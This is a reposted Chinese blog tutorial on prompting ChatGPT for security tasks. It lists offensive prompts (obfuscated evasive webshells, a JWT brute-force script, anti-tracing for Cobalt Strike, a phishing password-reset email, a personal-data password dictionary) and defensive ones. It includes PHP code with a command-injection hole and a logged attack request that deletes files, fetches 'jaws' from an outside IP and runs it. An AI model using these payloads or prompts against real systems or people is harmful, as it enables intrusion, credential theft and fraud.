0


基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求

文章目录

在这里插入图片描述

Chatgpt科普

  1. ChatGPT是什么?ChatGPT–可能很多人被这个缩写的名字搞糊涂了,第一眼无法看出到底什么意思,GPT 的英文原文是 Generative Pre-training Transformer(预训练生成模型),业界有人将 ChatGPT 概括为聊天机器人+搜索工具+文本创造工具的组合,或者简单理解它是一个生成式 AI(内容生成器)。
  2. ChatGPT能做什么? 它的主要功能是协助回答问题、提供信息和生成有关历史、科学、地理等各种主题的信息,这些信息仅限于它所接受的训练,但其知识在不断扩展。
  3. ChatGPT牛在哪里? (1)它是个通用的模型,只要提示词引导,就能快速适应不同领域。 (2)它能理解你的问题,只要给的引导越多,它就能给出你想要的答案。
  4. 安全行业影响: (1)整合多种恶意软件 (2)提升漏洞发现能力 (3)给新手攻击者赋能 (4)便于社会工程学攻击 (5)快速筛选和锁定目标 (6)模拟网络防御攻击技术

利用:

安全开发

1、如何使用Python写一个jwt爆破脚本?
在这里插入图片描述
2、如何使用Python写一个Webshell检测脚本?
3、如何使用Python写一个MS17010漏洞检测脚本?
4、使用PHP开发一个免杀混淆复杂的webshell脚本
5、在渗透测试靶机中,发现PHP脚本被禁用了敏感函数,如何生成一个绕过的webshell

逆向免杀

1、APK使用什么工具进行反编译?
在这里插入图片描述
2、常见脱壳工具有那些?
3、免杀中使用什么加壳效果好?

代码审计

1、下面代码会出现哪些安全漏洞?又该如何利用呢?

<?phpif(isset($_POST['Submit'])){// Get input$target=$_REQUEST['ip'];// Determine OS and execute the ping command.if(stristr(php_uname('s'),'Windows NT')){// Windows$cmd=shell_exec('ping  '.$target);}else{// *nix$cmd=shell_exec('ping  -c 4 '.$target);}// Feedback for the end user$html.="<pre>{$cmd}</pre>";}?>

在这里插入图片描述

2、Thinkphp历史漏洞有哪些?
3、shiro反序列化漏洞如何利用?

蓝队应急

0、平台项目:
蓝队针对攻击威胁感知平台项目有哪些?
1、日志分析:
103.178.229.152 - - [12/Mar/2023:07:16:02 +0800] “GET /shell?cd+/tmp;rm±rf+*;wget+128.199.134.42/jaws;sh+/tmp/jaws HTTP/1.1” 404 146 “-” “Hello, world”
在这里插入图片描述
2、流量检测:
写一个检测cobaltstrike payload的脚本
写一个Cobalstrike检测rules规则

APT社工学

1、防溯源:Cobaltstike如何防止被溯源
2、钓鱼邮件:由于系统升级,公司通知员工必须修改自己的密码,请在新业务网站上进行修改,帮我写一份规范的邮件通知
3、字典生成:用户名:xiaodi 电话:13512345678 QQ:471656814 密码组合?
在这里插入图片描述

其他相关:

网络安全渗透测试简历模版 早知道前几天投简历就用这个了 emmm
在这里插入图片描述
网络安全渗透测试报告模版


本文转载自: https://blog.csdn.net/weixin_53009585/article/details/129643060
版权归原作者 今天是 几 号 所有, 如有侵权,请联系我们删除。

“基础入门-ChatGPT&结合安全&融入技术&高效赋能&拓展需求”的评论:

还没有评论